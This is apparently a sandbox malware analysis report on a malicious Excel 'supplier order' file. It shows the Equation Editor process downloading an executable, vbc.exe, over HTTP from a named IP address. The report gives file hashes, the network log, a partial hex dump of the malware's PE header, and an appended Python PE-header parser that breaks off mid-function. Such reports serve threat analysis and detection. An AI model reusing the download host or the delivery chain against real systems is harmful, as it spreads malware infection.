    SSDEEP:48:H73wCcD5X+ajENpby1MTln0V1oPd8V8EAWG09tXIa1iBINm4YwFi9:H73KAajQPiMWJG08a1qINm4jU9
    MD5:E46357D82EBC866EEBDA98FA8F94B385
    SHA1:76C27D89AB2048AE7B56E401DCD1B0449B6DDF05
    SHA-256:B77A19A2F45CBEE79DA939F995DBD54905DED5CB31E7DB6A6BE40A7F6882F966
    SHA-512:8EC0060D1E4641243844E596031EB54EE642DA965078B5A3BC0B9E762E25D6DF6D1B05EACE092BA53B3965A29E3D34387A5A74EB3035D1A51E8F2025192468F3
    Malicious:false
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
    Category:dropped
    Size (bytes):11303
    Entropy (8bit):7.909402464702408
    Encrypted:false
    SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
    MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
    SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
    SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
    SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
    Malicious:false
    Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):512
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:BF619EAC0CDF3F68D496EA9344137E8B
    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
    Malicious:false
    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):512
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:BF619EAC0CDF3F68D496EA9344137E8B
    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
    Malicious:false
    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:CDFV2 Encrypted
    Category:dropped
    Size (bytes):188488
    Entropy (8bit):7.9577593900244965
    Encrypted:false
    SSDEEP:3072:6EmIit1DhLZAdQFZ7/a96EBEiE694tQDBbZuVqXx4N6KKbq0tTnZEaxwjsaHALv0:Jgt1dLZAY0bBEi3iQ9NcqXxGuV2HHw0
    MD5:650BB8E5FE570BDE782BE21C4E9F421C
    SHA1:FD3FFA031546F1DFA7ED884689CA1E85941FCA1E
    SHA-256:247838308FB5E12A258DEF82A63E3A752D1536D1771539D63CEBCF283B8154B5
    SHA-512:B288B2BFF546A427C6C683879F4AA17F60C794B8A0DF3ABFEA37451490C7F737A5BA5460FAB91E09CEA69A0E6DBF6DFF7CA65206369E7E8E19AB2058B7342CC7
    Malicious:false
    Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):512
    Entropy (8bit):0.0
    Encrypted:false
    SSDEEP:3::
    MD5:BF619EAC0CDF3F68D496EA9344137E8B
    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
    Malicious:false
    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
    File Type:data
    Category:dropped
    Size (bytes):165
    Entropy (8bit):1.4377382811115937
    Encrypted:false
    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
    MD5:797869BB881CFBCDAC2064F92B26E46F
    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
    Malicious:true
    Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
    Category:dropped
    Size (bytes):229376
    Entropy (8bit):7.903722597215708
    Encrypted:false
    SSDEEP:3072:AZZ8kwSCcwugf3DaUrpXtKY/c3QSXCjE/jIgQW9BPnXKWIhmpCCBHhGThql:mCugfz/5t//sTXC2b3rPXahqC
    MD5:CE42FE431B88922AB59B6FD880CADCF6
    SHA1:652914D960DA1D37D270DB7F6E3B07C9D4B0E3A9
    SHA-256:4D8CC87942499042195CEC4FDB2FC5869D4BF98A1D827FD30FB74E82CF0FDC0F
    SHA-512:62B30A77CB2EF3491ABB3EC517CA966C4A9EAFA0F263118BA817A4CE87F8D3CDDC014BCE25FF268435B7F69605E6C14B8031B482F7CAF00E855964C618C609BA
    Malicious:true
    Antivirus:
    • Antivirus: Joe Sandbox ML, Detection: 100%
    • Antivirus: ReversingLabs, Detection: 41%
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....~b.................v...|.......... ........@.. ....................................`.................................p...W....................................P............................................... ............... ..H............text....u... ...v.................. ..`.reloc...............x..............@..B.rsrc................z..............@..@........................H........P...D...........=..............................................".(.....*....0...........(>...*..0..6.......+.&.(.....(.....(....:.....E.........-......&&..(.... y...(....%& ~...(....%&(.... ....(.... ....(....(.... ....(.... ....(....(.... ....(.... ....(....%&(.... ....(....%& ....(....(.......(....(....:.....E........&..(......(....9....&.(.......(....(....%&:.....E........&...(.......(........(....%&(....&. (....8.....$(....(....%.((.......%.,(....~?....%.0(......
    File type:CDFV2 Encrypted
    Entropy (8bit):7.9577593900244965
    TrID:
    • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
    File name:TedarikciSiparisi_83613 .xlsx
    File size:188488
    MD5:650bb8e5fe570bde782be21c4e9f421c
    SHA1:fd3ffa031546f1dfa7ed884689ca1e85941fca1e
    SHA256:247838308fb5e12a258def82a63e3a752d1536d1771539d63cebcf283b8154b5
    SHA512:b288b2bff546a427c6c683879f4aa17f60c794b8a0df3abfea37451490c7f737a5ba5460fab91e09cea69a0e6dbf6dff7ca65206369e7e8e19ab2058b7342cc7
    SSDEEP:3072:6EmIit1DhLZAdQFZ7/a96EBEiE694tQDBbZuVqXx4N6KKbq0tTnZEaxwjsaHALv0:Jgt1dLZAY0bBEi3iQ9NcqXxGuV2HHw0
    TLSH:0B041267B487283DF61262390A8B5493C52C9FCB88BBD16A468CBD75F77CE6050B243D
    File Content Preview:........................>......................................................................................................................................................................................................................................
    Icon Hash:e4e2aa8aa4b4bcb4
    Timestamp | Source Port | Dest Port | Source IP | Dest IP
    May 14, 2022 15:14:12.248838902 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:12.467067957 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:12.467297077 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:12.468460083 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:12.687846899 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:12.687892914 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:12.687918901 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:12.687942028 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:12.688054085 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:12.692761898 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:12.906400919 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:12.906440020 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:12.906470060 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:12.906497955 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:12.906524897 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:12.906553984 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:12.906555891 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:12.906588078 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:12.906590939 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:12.906594038 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:12.910749912 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:12.910798073 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:12.910878897 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:12.910897017 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.124620914 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.124664068 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.124681950 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.124692917 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.124703884 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.124722958 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.124732018 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.124754906 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.124763966 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.124785900 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.124799013 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.124815941 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.124823093 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.124842882 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.124852896 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.124872923 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.124880075 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.124902964 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.124911070 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.124931097 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.124939919 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.124960899 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.124968052 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.124998093 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.126954079 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.128725052 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.128786087 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.128842115 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.128844976 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.128849983 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.128881931 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.128887892 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.128926039 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.342945099 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343007088 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343050957 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343091011 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343121052 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343125105 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343126059 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343163967 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343167067 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343202114 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343209028 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343250990 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343255043 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343287945 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343291998 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343332052 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343333960 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343372107 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343373060 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343411922 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343414068 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343451977 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343453884 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343493938 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343493938 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343529940 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343534946 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343569994 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343575001 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343612909 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343616009 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343653917 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343658924 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343696117 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343698025 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343735933 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343739986 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343776941 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343785048 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343822956 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343825102 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    May 14, 2022 15:14:13.343863010 CEST | 49171 | 80 | 192.168.2.22 | 180.214.238.224
    May 14, 2022 15:14:13.343864918 CEST | 80 | 49171 | 180.214.238.224 | 192.168.2.22
    • 180.214.238.224
    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
    0 | 192.168.2.22 | 49171 | 180.214.238.224 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Timestamp | kBytes transferred | Direction | Data
    May 14, 2022 15:14:12.468460083 CEST | 2 | OUT | GET /__cloud_for_file/vbc.exe HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: 180.214.238.224
    Connection: Keep-Alive
    May 14, 2022 15:14:12.687846899 CEST | 3 | IN | HTTP/1.1 200 OK
    Date: Sat, 14 May 2022 13:14:18 GMT
    Server: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28
    Last-Modified: Fri, 13 May 2022 09:07:10 GMT
    ETag: "38000-5dee0ffdad130"
    Accept-Ranges: bytes
    Content-Length: 229376
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Content-Type: application/x-msdownload
    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ba 1f 7e 62 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 76 03 00 00 7c 03 00 00 00 00 00 ca 95 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 95 03 00 57 00 00 00 00 c0 03 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 0c 00 00 00 18 50 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 75 03 00 00 20 00 00 00 76 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 c8 05 00 00 00 c0 03 00 00 06 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 95 03 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 50 03 00 d4 44 00 00 03 00 02 00 03 00 00 06 08 3d 00 00 10 13 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 00 28 0b 00 00 06 00 2a 00 00 00 03 30 09 00 07 00 00 00 00 00 00 00 02 28 3e 00 00 0a 2a 00 13 30 08 00 36 02 00 00 01 00 00 11 2b 07 26 16 28 11 00 00 06 1a 28 11 00 00 06 1e 28 11 00 00 06 3a e9 01 00 00 
18 45 01 00 00 00 f6 ff ff ff 17 2d 06 d0 03 00 00 06 26 26 00 17 28 18 00 00 06 20 79 e7 07 00 28 18 00 00 06 25 26 20 7e e7 07 00 28 18 00 00 06 25 26 28 7f 00 00 06 20 81 e7 07 00 28 18 00 00 06 20 88 e7 07 00 28 18 00 00 06 28 80 00 00 06 20 8b e7 07 00 28 18 00 00 06 20 8e e7 07 00 28 18 00 00 06 28 80 00 00 06 20 91 e7 07 00 28 18 00 00 06 20 94 e7 07 00 28 18 00 00 06 25 26 28 80 00 00 06 20 97 e7 07 00 28 18 00 00 06 25 26 20 a0 e7 07 00 28 18 00 00 06 28 80 00 00 06 0a 1f 0c 28 11 00 00 06 28 06 00 00 06 3a 0d 01 00 00 1a 45 01 00 00 00 f6 ff ff ff 26 1f 10 28 11 00 00 06 1f 14 28 11 00 00 06 39 19 01 00 00 26 06 28 a4 00 00 06 0b 1f 18 28 11 00 00 06 28 05 00 00 06 25 26 3a fe 00 00 00 1d 45 01 00 00 00 f6 ff ff ff 26 11 05 08 28 c4 00 00 06 09 1f 1c 28 11 00 00 06 14 14 11 06 28 d9 00 00 06 25 26 28 ba 00 00 06 26 1f 20 28 11 00 00 06 38 c6 00 00 00 1f 24 28 11 00 00 06 28 96 00 00 06 25 1f 28 28 11 00 00 06 11 04 a2 25 1f 2c 28 11 00 00 06 7e 3f 00 00 0a a2 25 1f 30 28 11 00 00 06 07 a2 25 1f 34 28 11 00 00 06
    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL~b.v| @ `pWP H.textu v `.relocx@B.rsrcz@@HPD="(*0(>*06+&(((:E-&&( y(%& ~(%&( ( (( ( (( ( (%&( (%& ((((:E&((9&(((%&:E&(((%&(& (8$((%((%,(~?%0(%4(
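
The response body above is the PE file that EQNEDT32.EXE fetched over plain HTTP and that later runs as C:\Users\Public\vbc.exe. The Python below is an added example, not part of the Joe Sandbox report: it transcribes the first 0x250 bytes of the Data Raw dump, parses the DOS/NT headers, section table and CLR header by hand with struct, and cross-checks the result against what the report states elsewhere (three sections, a .NET assembly, 229376 bytes, the ETag and Last-Modified headers). The only assumption beyond the bytes on the page is that the dump starts at offset 0 of the file, which the leading MZ signature supports.

```python
import struct
from datetime import datetime, timezone

# Offsets 0x000-0x24f of the response body, transcribed from the "Data Raw"
# line of the HTTP stream above: DOS header and stub, PE signature, COFF and
# optional headers, section table, IAT and CLR header. Later bytes are IL code.
VBC_EXE_HEAD = bytes.fromhex("""
4d5a900003000000 04000000ffff0000 b800000000000000 4000000000000000
0000000000000000 0000000000000000 0000000000000000 0000000080000000
0e1fba0e00b409cd 21b8014ccd215468 69732070726f6772 616d2063616e6e6f
742062652072756e 20696e20444f5320 6d6f64652e0d0d0a 2400000000000000
504500004c010300 ba1f7e6200000000 00000000e0002e01 0b01060000760300
007c030000000000 ca95030000200000 00a0030000004000 0020000000020000
0400000000000000 0400000000000000 00e0030000020000 0000000002006085
0000100000100000 0000100000100000 0000000010000000 0000000000000000
7095030057000000 00c00300c8050000 0000000000000000 0000000000000000
00a003000c000000 185003001c000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000 0000000000000000 0020000008000000
0000000000000000 0820000048000000 0000000000000000 2e74657874000000
d075030000200000 0076030000020000 0000000000000000 0000000020000060
2e72656c6f630000 0c00000000a00300 0002000000780300 0000000000000000
0000000040000042 2e72737263000000 c805000000c00300 00060000007a0300
0000000000000000 0000000040000040 0000000000000000 0000000000000000
ac95030000000000 4800000002000500 9c500300d4440000 0300020003000006
083d000010130300 0000000000000000 0000000000000000 0000000000000000
0000000000000000 0000000000000000
""")

# Values stated elsewhere in the report, used for cross-checking.
CONTENT_LENGTH = 229376                    # HTTP Content-Length; also the dropped-file size
ETAG = '"38000-5dee0ffdad130"'             # Apache ETag is "<size-hex>-<mtime-hex>"
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14  # data directory slot of the CLR header


def parse_pe_headers(data):
    """Parse the DOS header, COFF header, PE32 optional header and section table."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled here")
    entry_point = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    n_dirs = struct.unpack_from("<I", data, opt + 92)[0]
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(n_dirs)]
    sections = []
    for i in range(nsections):
        hdr = opt + opt_size + 40 * i
        name, vsize, va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, hdr)
        sections.append({"name": name.rstrip(b"\0").decode("ascii"), "vsize": vsize,
                         "va": va, "raw_size": raw_size, "raw_ptr": raw_ptr})
    return {"machine": machine, "timestamp": timestamp, "entry_point": entry_point,
            "image_base": image_base, "subsystem": subsystem, "dirs": dirs,
            "sections": sections}


def rva_to_offset(pe, rva):
    """Map a relative virtual address to a file offset through the section table."""
    for s in pe["sections"]:
        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw_size"]):
            return rva - s["va"] + s["raw_ptr"]
    raise ValueError(f"RVA {rva:#x} is not backed by any section")


def file_size_from_sections(pe):
    """End of the last section's raw data: the size the file should have on disk."""
    return max(s["raw_ptr"] + s["raw_size"] for s in pe["sections"])


def parse_clr_header(data, pe):
    """Return the leading IMAGE_COR20_HEADER fields, or None for a native PE."""
    rva, size = pe["dirs"][IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR]
    if rva == 0 or size == 0:
        return None
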